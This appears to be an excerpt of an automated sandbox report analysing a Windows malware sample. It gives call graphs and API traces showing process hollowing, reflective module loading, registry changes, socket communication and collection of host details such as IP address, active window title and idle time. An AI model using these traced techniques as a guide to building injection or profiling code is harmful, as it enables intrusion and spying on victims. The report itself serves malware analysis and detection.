48547->48550 48590 976e49 66 API calls 2 library calls 48547->48590 48552 97c144 __lock 66 API calls 48550->48552 48553 9799ba 48552->48553 48554 9799c6 InterlockedDecrement 48553->48554 48555 9799df 48553->48555 48554->48555 48557 9799d1 48554->48557 48592 979a43 LeaveCriticalSection _doexit 48555->48592 48557->48555 48591 976e49 66 API calls 2 library calls 48557->48591 48558 9799ec 48559 97c144 __lock 66 API calls 48558->48559 48561 9799f3 48559->48561 48562 979a24 48561->48562 48593 97df0e 8 API calls 48561->48593 48595 979a4f LeaveCriticalSection _doexit 48562->48595 48565 979a31 48596 976e49 66 API calls 2 library calls 48565->48596 48567 979a08 48567->48562 48594 97dfa7 66 API calls 4 library calls 48567->48594 48570 977181 ___DllMainCRTStartup 48569->48570 48571 97990f __getptd 66 API calls 48570->48571 48572 977186 48571->48572 48597 9730c0 48572->48597 48602 9752b0 48572->48602 48613 9752d9 48572->48613 48624 972fb0 48572->48624 48573 977190 48634 977156 48573->48634 48575 977196 48576 979c41 __XcptFilter 66 API calls 48575->48576 48577 9771a7 48576->48577 48582->48527 48583->48537 48584->48542 48585->48540 48586->48541 48587->48544 48588->48546 48589->48547 48590->48550 48591->48555 48592->48558 48593->48567 48594->48562 48595->48565 48596->48535 48598 9730d4 48597->48598 48599 973128 48597->48599 48598->48599 48600 9730e8 Sleep 48598->48600 48601 973104 timeGetTime 48598->48601 48599->48573 48600->48598 48601->48598 48603 97536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 48602->48603 48609 9752cc 48602->48609 48604 97543c 48603->48604 48605 9753ca 48603->48605 48662 2820497 48604->48662 48608 975403 OpenProcess 48605->48608 48611 97542f Sleep 48605->48611 48640 975820 48605->48640 48608->48605 48610 975415 GetExitCodeProcess 48608->48610 48609->48603 48610->48605 48611->48608 48615 9752d2 48613->48615 48614 97536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 48616 97543c 48614->48616 48617 9753ca 48614->48617 48615->48614 48623 2820497 583 API calls 48616->48623 48619 975820 105 API calls 48617->48619 48620 975403 OpenProcess 48617->48620 48622 97542f Sleep 48617->48622 48618 975442 48618->48573 48619->48617 48620->48617 48621 975415 GetExitCodeProcess 48620->48621 48621->48617 48622->48620 48623->48618 48625 9767ff 77 API calls 48624->48625 48626 972fd3 48625->48626 48627 973014 select 48626->48627 48628 97306d 48626->48628 48630 973032 recv 48626->48630 48633 97710d 66 API calls __write_nolock 48626->48633 48842 973350 48626->48842 48627->48626 48627->48628 48629 976815 __write_nolock 5 API calls 48628->48629 48631 973098 48629->48631 48630->48626 48631->48573 48633->48626 48635 979896 __getptd_noexit 66 API calls 48634->48635 48636 977160 48635->48636 48637 97716b ExitThread 48636->48637 48924 979a58 79 API calls __freefls@4 48636->48924 48639 97716a 48639->48637 48641 97584e _memset 48640->48641 48642 9758a2 GetSystemDirectoryA 48641->48642 48667 9759e0 97 API calls _vswprintf_s 48642->48667 48644 9758d6 GetFileAttributesA 48645 97590b CreateProcessA 48644->48645 48646 9758eb 48644->48646 48648 975932 48645->48648 48649 975940 VirtualAllocEx 48645->48649 48668 9759e0 97 API calls _vswprintf_s 48646->48668 48653 976815 __write_nolock 5 API calls 48648->48653 48650 9759ac 48649->48650 48651 97595a WriteProcessMemory 48649->48651 48656 976815 __write_nolock 5 API calls 48650->48656 48651->48650 48655 975972 GetThreadContext 48651->48655 48652 975908 48652->48645 48654 97593c 48653->48654 48654->48605 48655->48650 48657 975991 SetThreadContext 48655->48657 48658 9759b9 48656->48658 48657->48650 48659 9759bd ResumeThread 48657->48659 48658->48605 48660 976815 __write_nolock 5 API calls 48659->48660 48661 9759d7 48660->48661 48661->48605 48669 28200cd GetPEB 48662->48669 48664 28204a8 48666 975442 48664->48666 48671 28201cb 48664->48671 48666->48573 48667->48644 48668->48652 48670 28200e5 48669->48670 48670->48664 48672 28201e6 48671->48672 48677 28201df 48671->48677 48673 282021e VirtualAlloc 48672->48673 48672->48677 48676 2820238 48673->48676 48673->48677 48674 2820330 LoadLibraryA 48674->48676 48674->48677 48675 28203a3 48675->48677 48679 2d111f2 48675->48679 48676->48674 48676->48675 48677->48666 48680 2d11202 48679->48680 48681 2d111fd 48679->48681 48685 2d110fc 48680->48685 48697 2d18262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 48681->48697 48684 2d11210 48684->48677 48686 2d11108 __tzset_nolock 48685->48686 48687 2d11155 48686->48687 48694 2d111a5 __tzset_nolock 48686->48694 48698 2d10f98 48686->48698 48687->48694 48750 2d0e480 48687->48750 48691 2d11185 48692 2d10f98 __CRT_INIT@12 149 API calls 48691->48692 48691->48694 48692->48694 48693 2d0e480 ___DllMainCRTStartup 526 API calls 48695 2d1117c 48693->48695 48694->48684 48696 2d10f98 __CRT_INIT@12 149 API calls 48695->48696 48696->48691 48697->48680 48699 2d10fa4 __tzset_nolock 48698->48699 48700 2d11026 48699->48700 48701 2d10fac 48699->48701 48703 2d11087 48700->48703 48704 2d1102c 48700->48704 48754 2d11a1b HeapCreate 48701->48754 48705 2d110e5 48703->48705 48706 2d1108c 48703->48706 48710 2d1104a 48704->48710 48717 2d10fb5 __tzset_nolock 48704->48717 48764 2d11ce6 66 API calls _doexit 48704->48764 48705->48717 48797 2d13fa6 79 API calls __freefls@4 48705->48797 48769 2d13ca0 TlsGetValue 48706->48769 48707 2d10fb1 48709 2d10fbc 48707->48709 48707->48717 48755 2d14014 86 API calls 4 library calls 48709->48755 48715 2d1105e 48710->48715 48765 2d17dfb 67 API calls _free 48710->48765 48768 2d11071 70 API calls __mtterm 48715->48768 48717->48687 48719 2d10fc1 __RTC_Initialize 48722 2d10fc5 48719->48722 48727 2d10fd1 GetCommandLineA 48719->48727 48756 2d11a39 HeapDestroy 48722->48756 48723 2d11054 48766 2d13cf1 70 API calls _free 48723->48766 48724 2d110a9 DecodePointer 48732 2d110be 48724->48732 48757 2d1817f 71 API calls 2 library calls 48727->48757 48728 2d10fca 48728->48717 48729 2d11059 48767 2d11a39 HeapDestroy 48729->48767 48734 2d110c2 48732->48734 48735 2d110d9 48732->48735 48733 2d10fe1 48758 2d17bb6 73 API calls __calloc_crt 48733->48758 48778 2d13d2e 48734->48778 48791 2d0f639 48735->48791 48739 2d10feb 48741 2d10fef 48739->48741 48760 2d180c4 95 API calls 3 library calls 48739->48760 48740 2d110c9 GetCurrentThreadId 48740->48717 48759 2d13cf1 70 API calls _free 48741->48759 48744 2d10ffb 48745 2d1100f 48744->48745 48761 2d17e4e 94 API calls 6 library calls 48744->48761 48745->48728 48763 2d17dfb 67 API calls _free 48745->48763 48748 2d11004 48748->48745 48762 2d11af9 77 API calls 4 library calls 48748->48762 48751 2d0e489 48750->48751 48752 2d0e4af 48750->48752 48751->48752 48753 2d0e491 CreateThread WaitForSingleObject 48751->48753 48752->48691 48752->48693 48753->48752 48798 2d0df10 48753->48798 48754->48707 48755->48719 48756->48728 48757->48733 48758->48739 48759->48722 48760->48744 48761->48748 48762->48745 48763->48741 48764->48710 48765->48723 48766->48729 48767->48715 48768->48717 48770 2d11091 48769->48770 48771 2d13cb5 DecodePointer TlsSetValue 48769->48771 48772 2d14534 48770->48772 48771->48770 48774 2d1453d 48772->48774 48773 2d1a6f2 __calloc_crt 65 API calls 48773->48774 48774->48773 48775 2d1109d 48774->48775 48776 2d1455b Sleep 48774->48776 48775->48717 48775->48724 48777 2d14570 48776->48777 48777->48774 48777->48775 48779 2d14300 __tzset_nolock 48778->48779 48780 2d13d3a GetModuleHandleW 48779->48780 48781 2d18e5b __lock 64 API calls 48780->48781 48782 2d13d78 InterlockedIncrement 48781->48782 48783 2d13dd0 __CRT_INIT@12 LeaveCriticalSection 48782->48783 48784 2d13d92 48783->48784 48785 2d18e5b __lock 64 API calls 48784->48785 48786 2d13d99 48785->48786 48787 2d14d46 ___addlocaleref 8 API calls 48786->48787 48788 2d13db7 48787->48788 48789 2d13dd9 __CRT_INIT@12 LeaveCriticalSection 48788->48789 48790 2d13dc4 __tzset_nolock 48789->48790 48790->48740 48792 2d0f66d __dosmaperr 48791->48792 48793 2d0f644 RtlFreeHeap 48791->48793 48792->48717 48793->48792 48794 2d0f659 48793->48794 48795 2d0f91b __write_nolock 64 API calls 48794->48795 48796 2d0f65f GetLastError 48795->48796 48796->48792 48797->48717 48799 2d10542 67 API calls 48798->48799 48800 2d0df5a Sleep 48799->48800 48801 2d0df74 48800->48801 48802 2d0df97 48800->48802 48805 2d0f707 77 API calls 48801->48805 48803 2d0dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 48802->48803 48804 2d0df9f 48802->48804 48807 2d0fa29 289 API calls 48803->48807 48806 2d07620 14 API calls 48804->48806 48808 2d0df7b 48805->48808 48806->48803 48810 2d0e003 CloseHandle 48807->48810 48809 2d0fa29 289 API calls 48808->48809 48811 2d0df8d CloseHandle 48809->48811 48812 2d0f707 77 API calls 48810->48812 48811->48802 48813 2d0e014 48812->48813 48814 2d0e022 48813->48814 48815 2d02c90 8 API calls 48813->48815 48816 2d0f707 77 API calls 48814->48816 48815->48814 48817 2d0e036 48816->48817 48818 2d09730 80 API calls 48817->48818 48822 2d0e04e 48817->48822 48818->48822 48819 2d0f876 66 API calls __NMSG_WRITE 48819->48822 48820 2d0e189 EnumWindows 48821 2d0e1a5 Sleep EnumWindows 48820->48821 48820->48822 48821->48821 48821->48822 48822->48819 48822->48820 48823 2d0e1f0 Sleep 48822->48823 48824 2d10542 67 API calls 48822->48824 48825 2d0e239 CreateEventA 48822->48825 48841 2d02da0 306 API calls 48822->48841 48823->48822 48824->48822 48826 2d0f876 __NMSG_WRITE 66 API calls 48825->48826 48828 2d0e281 48826->48828 48827 2d0ca70 113 API calls 48827->48828 48828->48827 48829 2d0e2bf Sleep RegOpenKeyExW 48828->48829 48831 2d05430 268 API calls 48828->48831 48835 2d0e339 48828->48835 48829->48828 48830 2d0e2f5 RegQueryValueExW 48829->48830 48830->48828 48831->48828 48832 2d0e345 CloseHandle 48832->48822 48833 2d0fa29 289 API calls 48833->48835 48834 2d0e39f Sleep 48834->48835 48835->48832 48835->48833 48835->48834 48836 2d0e422 WaitForSingleObject CloseHandle 48835->48836 48837 2d10542 67 API calls 48835->48837 48839 2d0e3dd Sleep CloseHandle 48835->48839 48840 2d0e3cd WaitForSingleObject CloseHandle 48835->48840 48836->48835 48838 2d0e43c Sleep CloseHandle 48837->48838 48838->48822 48839->48822 48840->48839 48841->48822 48843 973366 48842->48843 48854 971100 48843->48854 48845 9734e1 48845->48626 48846 9734c6 48847 9711b0 70 API calls 48846->48847 48848 9734d8 48847->48848 48848->48626 48849 973403 timeGetTime 48862 9711b0 48849->48862 48851 973378 _memmove 48851->48845 48851->48846 48851->48849 48852 9711b0 70 API calls 48851->48852 48871 9754c0 48851->48871 48852->48851 48855 971111 48854->48855 48856 97110b 48854->48856 48903 976ba0 48855->48903 48856->48851 48858 971134 VirtualAlloc 48859 97116f 48858->48859 48860 97118a VirtualFree 48859->48860 48861 971198 48859->48861 48860->48861 48861->48851 48863 9711bd 48862->48863 48864 9711c6 48863->48864 48865 976ba0 __floor_pentium4 68 API calls 48863->48865 48864->48851 48866 9711ee 48865->48866 48867 971214 48866->48867 48868 97121b VirtualAlloc 48866->48868 48867->48851 48869 971236 48868->48869 48870 971247 VirtualFree 48869->48870 48870->48851 48872 9754dc 48871->48872 48896 97580d 48871->48896 48873 975707 VirtualAlloc 48872->48873 48874 9754e7 RegOpenKeyExW 48872->48874 48876 975745 48873->48876 48875 975515 RegQueryValueExW 48874->48875 48881 9755ba 48874->48881 48877 9755ad RegCloseKey 48875->48877 48878 97553a 48875->48878 48880 9767ff 77 API calls 48876->48880 48877->48881 48879 9767ff 77 API calls 48878->48879 48882 975540 _memset 48879->48882 48883 975758 48880->48883 48884 9755f5 48881->48884 48885 9756f8 48881->48885 48887 97554d RegQueryValueExW 48882->48887 48883->48885 48891 975788 RegCreateKeyW 48883->48891 48886 9755fe VirtualFree 48884->48886 48897 975611 _memset 48884->48897 48888 97721b 743 API calls 48885->48888 48886->48897 48889 9755aa 48887->48889 48890 975569 VirtualAlloc 48887->48890 48894 9757f3 Sleep 48888->48894 48889->48877 48895 9755a5 48890->48895 48892 9757a3 RegDeleteValueW RegSetValueExW 48891->48892 48893 9757ca RegCloseKey 48891->48893 48892->48893 48893->48885 48921 972d10 48894->48921 48895->48889 48896->48851 48898 9767ff 77 API calls 48897->48898 48900 9756b1 48898->48900 48899 9756e6 ctype 48899->48851 48900->48899 48917 9760df 48900->48917 48904 976bad 48903->48904 48907 977d77 __ctrlfp __floor_pentium4 48903->48907 48905 976bde 48904->48905 48904->48907 48912 976c28 48905->48912 48914 977a9b 67 API calls __write_nolock 48905->48914 48906 977de5 __floor_pentium4 48911 977dd2 __ctrlfp 48906->48911 48916 97bc80 67 API calls 6 library calls 48906->48916 48907->48906 48910 977dc2 48907->48910 48907->48911 48915 97bc2b 66 API calls 3 library calls 48910->48915 48911->48858 48912->48858 48914->48912 48915->48911 48916->48911 48918 9760e5 48917->48918 48919 9711b0 70 API calls 48918->48919 48920 98fab1 GetCurrentThreadId 48919->48920 48922 972d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 48921->48922 48923 972d70 48921->48923 48922->48923 48923->48896 48924->48639 48925->48484 48926 98f0df 48933 972c60 WSAStartup CreateEventW InterlockedExchange 48926->48933 48928 976f17 77 API calls 48929 98f0e4 48928->48929 48929->48928 48930 98f7db 48929->48930 48936 975a20 CreateEventW 48930->48936 48934 976815 __write_nolock 5 API calls 48933->48934 48935 972cff 48934->48935 48935->48929 48937 975a83 48936->48937 48938 975a79 48936->48938 48964 976410 HeapCreate 48937->48964 48970 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48938->48970 48942 975b12 48971 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48942->48971 48943 975b1c CreateEventW 48945 975b55 48943->48945 48946 975b5f CreateEventW 48943->48946 48972 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48945->48972 48948 975b84 CreateEventW 48946->48948 48949 975b7a 48946->48949 48951 975b9f 48948->48951 48952 975ba9 InitializeCriticalSectionAndSpinCount 48948->48952 48973 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48949->48973 48974 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48951->48974 48954 975c77 InitializeCriticalSectionAndSpinCount 48952->48954 48955 975c6d 48952->48955 48957 975c8e 48954->48957 48958 975c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 48954->48958 48975 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48955->48975 48976 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48957->48976 48960 9767ff 77 API calls 48958->48960 48961 975d2b 48960->48961 48962 9767ff 77 API calls 48961->48962 48963 975d3b 48962->48963 48965 976437 48964->48965 48966 976441 48964->48966 48977 971280 DeleteCriticalSection RaiseException __CxxThrowException@8 48965->48977 48968 975af2 InitializeCriticalSectionAndSpinCount 48966->48968 48978 976e49 66 API calls 2 library calls 48966->48978 48968->48942 48968->48943 48970->48937 48971->48943 48972->48946 48973->48948 48974->48952 48975->48954 48976->48958 48977->48966 48978->48968 48979 9732e0 6 API calls 48980 973200 Sleep 48981 990254 48980->48981 48982 97474c lstrlenW 48983 98fff8 48982->48983 48984 97638b 48985 971100 70 API calls 48984->48985 48986 976390 48985->48986 48987 98f927 48988 98fb9a 48987->48988 48990 9760df 71 API calls 48988->48990 48993 975ef8 48988->48993 48997 98f997 48988->48997 48989 98fb9c 48990->48989 48994 975f68 48993->48994 48995 971100 70 API calls 48994->48995 48996 98f9b7 48994->48996 48995->48994 48999 975f68 48997->48999 48998 98f9b7 48999->48998 49000 971100 70 API calls 48999->49000 49000->48999

                                                                                                  Executed Functions

                                                                                                  Function 02D05430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440stringnetworklibraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 2d05430-2d054b7 call 2d0f707 call 2d16770 * 3 gethostname gethostbyname 9 2d0555c-2d0569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 2d07490 GetSystemInfo wsprintfW call 2d06c50 call 2d06ee0 GetForegroundWindow 0->9 10 2d054bd-2d05504 inet_ntoa call 2d103cf * 2 0->10 23 2d056b2-2d056c0 9->23 24 2d0569f-2d056ac GetWindowTextW 9->24 10->9 20 2d05506-2d05508 10->20 22 2d05510-2d0555a inet_ntoa call 2d103cf * 2 20->22 22->9 26 2d056c2 23->26 27 2d056cc-2d056f0 lstrlenW call 2d06d70 23->27 24->23 26->27 33 2d05702-2d05726 call 2d0f876 27->33 34 2d056f2-2d056ff call 2d0f876 27->34 39 2d05732-2d05756 lstrlenW call 2d06d70 33->39 40 2d05728 33->40 34->33 43 2d05768-2d057b9 GetModuleHandleW GetProcAddress 39->43 44 2d05758-2d05765 call 2d0f876 39->44 40->39 46 2d057c6-2d057cd GetSystemInfo 43->46 47 2d057bb-2d057c4 GetNativeSystemInfo 43->47 44->43 49 2d057d3-2d057e1 46->49 47->49 50 2d057e3-2d057eb 49->50 51 2d057ed-2d057f2 49->51 50->51 53 2d057f4 50->53 52 2d057f9-2d05820 wsprintfW call 2d06a70 GetCurrentProcessId 51->52 56 2d05822-2d0583c OpenProcess 52->56 57 2d05885-2d0588c call 2d06690 52->57 53->52 56->57 58 2d0583e-2d05853 K32GetProcessImageFileNameW 56->58 63 2d0589e-2d058ab 57->63 64 2d0588e-2d0589c 57->64 60 2d05855-2d0585c 58->60 61 2d0585e-2d05866 call 2d080f0 58->61 65 2d0587f CloseHandle 60->65 68 2d0586b-2d0586d 61->68 67 2d058ac-2d059a1 call 2d0f876 call 2d06490 call 2d06150 call 2d0fc0e GetTickCount call 2d1043c call 2d103a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 63->67 64->67 65->57 83 2d059a3-2d059c8 67->83 84 2d059ca-2d059e9 67->84 70 2d05878-2d0587e 68->70 71 2d0586f-2d05876 68->71 70->65 71->65 85 2d059ea-2d05a14 call 2d05a30 call 2d03160 call 2d0efff 83->85 84->85 90 2d05a19-2d05a2e call 2d0f00a 85->90
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • _memset.LIBCMT ref: 02D0546C
                                                                                                  • _memset.LIBCMT ref: 02D05485
                                                                                                  • _memset.LIBCMT ref: 02D05495
                                                                                                  • gethostname.WS2_32(?,00000032), ref: 02D054A3
                                                                                                  • gethostbyname.WS2_32(?), ref: 02D054AD
                                                                                                  • inet_ntoa.WS2_32 ref: 02D054C5
                                                                                                  • _strcat_s.LIBCMT ref: 02D054D8
                                                                                                  • _strcat_s.LIBCMT ref: 02D054F1
                                                                                                  • inet_ntoa.WS2_32 ref: 02D0551A
                                                                                                  • _strcat_s.LIBCMT ref: 02D0552D
                                                                                                  • _strcat_s.LIBCMT ref: 02D05546
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02D05573
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02D05587
                                                                                                  • GetLastInputInfo.USER32(?), ref: 02D0559A
                                                                                                  • GetTickCount.KERNEL32 ref: 02D055A0
                                                                                                  • wsprintfW.USER32 ref: 02D055D5
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02D055E8
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 02D055FC
                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02D05653
                                                                                                  • wsprintfW.USER32 ref: 02D0566C
                                                                                                  • GetForegroundWindow.USER32 ref: 02D05695
                                                                                                  • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 02D056AC
                                                                                                  • lstrlenW.KERNEL32(000008CC), ref: 02D056D3
                                                                                                  • lstrlenW.KERNEL32(00000994), ref: 02D05739
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 02D057AA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D057B1
                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 02D057C2
                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 02D057CD
                                                                                                  • wsprintfW.USER32 ref: 02D05806
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 02D05818
                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 02D0582E
                                                                                                  • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 02D0584B
                                                                                                  • CloseHandle.KERNEL32(02D25164), ref: 02D0587F
                                                                                                  • GetTickCount.KERNEL32 ref: 02D058E9
                                                                                                  • __time64.LIBCMT ref: 02D058F8
                                                                                                  • __localtime64.LIBCMT ref: 02D0592F
                                                                                                  • wsprintfW.USER32 ref: 02D05968
                                                                                                  • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 02D0597D
                                                                                                  • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 02D0598C
                                                                                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 02D05999
                                                                                                    • Part of subcall function 02D080F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,753C73E0,00000AD4,00000000), ref: 02D08132
                                                                                                    • Part of subcall function 02D080F0: lstrcmpiW.KERNEL32(?,A:\), ref: 02D08166
                                                                                                    • Part of subcall function 02D080F0: lstrcmpiW.KERNEL32(?,B:\), ref: 02D08176
                                                                                                    • Part of subcall function 02D080F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02D081A6
                                                                                                    • Part of subcall function 02D080F0: lstrlenW.KERNEL32(?), ref: 02D081B7
                                                                                                    • Part of subcall function 02D080F0: __wcsnicmp.LIBCMT ref: 02D081CE
                                                                                                    • Part of subcall function 02D080F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 02D08204
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                  • String ID: %d min$1.0$2024.12.28$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                  • API String ID: 1101047656-2702497570
                                                                                                  • Opcode ID: 9d633347d0ac99190f89d9ea83d7b8fe463f196185edc97def8d7d6c76dc6539
                                                                                                  • Instruction ID: 788fc3d98ee7d89f4211edfd6b94c476b5942a138fd647e386725c68a949dc93
                                                                                                  • Opcode Fuzzy Hash: 9d633347d0ac99190f89d9ea83d7b8fe463f196185edc97def8d7d6c76dc6539
                                                                                                  • Instruction Fuzzy Hash: 75F1C4B1940314AFD724DB64EC85FDA73B9EF94700F404558FA0AA7391EA70AE48CF65
                                                                                                  Function 00920032 Relevance: 72.5, APIs: 3, Strings: 38, Instructions: 795memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 009204AE
                                                                                                  • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 009204DE
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 009204F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual$InfoNativeSystem
                                                                                                  • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                  • API String ID: 4117132724-2899676511
                                                                                                  • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                  • Instruction ID: a8b1fcab9c4d68184abdd7679326868ad6dce2967b9adf61ac965a4e9c92ea76
                                                                                                  • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                  • Instruction Fuzzy Hash: E1628A315083958FD720CF24D880BABBBE5FFD4704F04492DE9C99B256E774A988CB96
                                                                                                  Function 02D0DF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354sleepregistrysynchronizationCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 251 2d0df10-2d0df72 call 2d10542 Sleep 254 2d0df74-2d0df91 call 2d0f707 call 2d0fa29 CloseHandle 251->254 255 2d0df97-2d0df9d 251->255 254->255 256 2d0dfa4-2d0e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 2d0fa29 CloseHandle call 2d0f707 255->256 257 2d0df9f call 2d07620 255->257 267 2d0e028 256->267 268 2d0e01b-2d0e026 call 2d02c90 256->268 257->256 270 2d0e02c-2d0e046 call 2d0f707 267->270 268->270 274 2d0e054 270->274 275 2d0e048-2d0e049 call 2d09730 270->275 277 2d0e058 274->277 278 2d0e04e-2d0e052 275->278 279 2d0e063-2d0e06f call 2d0ce00 277->279 278->277 282 2d0e071-2d0e0b7 call 2d0f876 * 2 279->282 283 2d0e0b9-2d0e0fa call 2d0f876 * 2 279->283 292 2d0e100-2d0e110 282->292 283->292 293 2d0e152-2d0e15a 292->293 294 2d0e112-2d0e14c call 2d0ce00 call 2d0f876 * 2 292->294 296 2d0e162-2d0e169 293->296 297 2d0e15c-2d0e15e 293->297 294->293 299 2d0e177-2d0e17b 296->299 300 2d0e16b-2d0e175 296->300 297->296 301 2d0e181-2d0e187 299->301 300->301 303 2d0e1c6-2d0e1ee call 2d10542 call 2d02da0 301->303 304 2d0e189-2d0e1a3 EnumWindows 301->304 312 2d0e200-2d0e2ac call 2d10542 CreateEventA call 2d0f876 call 2d0ca70 303->312 313 2d0e1f0-2d0e1fb Sleep 303->313 304->303 306 2d0e1a5-2d0e1c4 Sleep EnumWindows 304->306 306->303 306->306 321 2d0e2b7-2d0e2bd 312->321 313->279 322 2d0e318-2d0e32c call 2d05430 321->322 323 2d0e2bf-2d0e2f3 Sleep RegOpenKeyExW 321->323 327 2d0e331-2d0e337 322->327 324 2d0e311-2d0e316 323->324 325 2d0e2f5-2d0e30b RegQueryValueExW 323->325 324->321 324->322 325->324 328 2d0e339-2d0e365 CloseHandle 327->328 329 2d0e36a-2d0e370 327->329 328->279 330 2d0e390 329->330 331 2d0e372-2d0e38e call 2d0fa29 329->331 332 2d0e394 330->332 331->332 336 2d0e396-2d0e39d 332->336 337 2d0e40d-2d0e420 336->337 338 2d0e39f-2d0e3ae Sleep 336->338 342 2d0e432-2d0e46c call 2d10542 Sleep CloseHandle 337->342 343 2d0e422-2d0e42c WaitForSingleObject CloseHandle 337->343 338->336 339 2d0e3b0-2d0e3b7 338->339 339->337 340 2d0e3b9-2d0e3cb 339->340 347 2d0e3dd-2d0e408 Sleep CloseHandle 340->347 348 2d0e3cd-2d0e3d7 WaitForSingleObject CloseHandle 340->348 342->279 343->342 347->279 348->347
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D10542: __fassign.LIBCMT ref: 02D10538
                                                                                                  • Sleep.KERNEL32(00000000), ref: 02D0DF64
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0DF91
                                                                                                  • GetLocalTime.KERNEL32(?), ref: 02D0DFA9
                                                                                                  • wsprintfW.USER32 ref: 02D0DFE0
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(02D075B0), ref: 02D0DFEE
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0E007
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • EnumWindows.USER32(02D05CC0,?), ref: 02D0E19D
                                                                                                  • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D0E1AA
                                                                                                  • EnumWindows.USER32(02D05CC0,?), ref: 02D0E1BE
                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 02D0E1F5
                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D0E241
                                                                                                  • Sleep.KERNEL32(00000FA0), ref: 02D0E2C4
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 02D0E2EB
